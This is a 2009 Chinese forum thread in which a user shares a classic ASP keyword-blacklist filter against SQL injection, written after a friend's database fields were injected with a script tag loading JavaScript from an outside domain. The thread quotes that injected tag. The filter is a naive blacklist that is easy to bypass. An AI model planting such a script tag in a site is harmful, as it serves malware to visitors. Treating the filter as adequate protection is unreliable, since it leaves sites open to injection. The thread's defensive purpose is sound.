龍宇 - 2009-1-7 16:02:00
今天一个朋友找我请教关于数据库的varchar 跟char类型字段被加入一段 <script src=http://cn.daxia123.cn/cn.js></script> 这个代码, 介于这个 他给我发了 本论坛的一些帖子, 通过帖子的内容查看 以及朋友网站iis日志记录分析得知 加入SQL防注入应该是有效果的, 只是这个防止注入代码的判断方式稍微修改下应该就可以了. 下面贴出来本人所写代码 希望可以帮助大家, 有没有效果希望都说出来 也为了继续修改代码让网站更安全!
希望测试的朋友可以参与下投票以便我知道是否有效果!
代码如下:
'龍宇添加防止SQL注入检测
'请将此代码加入到您网站的Conn连接文件中!
dim sql_injdata
SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|chr|mid|master|truncate|char|declare|daxia123|<script|/script>"
SQL_inj = split(SQL_Injdata,"|")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(LCase(Request.QueryString(SQL_Get)),LCase(Sql_Inj(Sql_DATA)))>0 Then
Response.Write "<Script Language='javascript'>alert('请不要在参数中包含非法字符尝试注入!');history.back(-1)</Script>"
Response.end
end if
next
Next
End If
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(LCase(Request.Form(Sql_Post)),LCase(Sql_Inj(Sql_DATA)))>0 Then
Response.Write "<Script Language='javascript'>alert('请不要在参数中包含非法字符尝试注入!');history.back(-1)</Script>"
Response.end
end if
next
next
end if
'检测结束 2009-1-7 By 龍宇
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
龍宇 - 2009-1-8 17:25:00
没错误呀?你那里提示什么???我这个已经给一个朋友使用了!昨天换的到现在没出现被挂马
jywww - 2009-1-9 8:56:00
我将代码直接粘贴到conn.asp 的开头,调用到时就直接在页面出现你写的代码原文和警告!
© 2000 - 2025 Rising Corp. Ltd.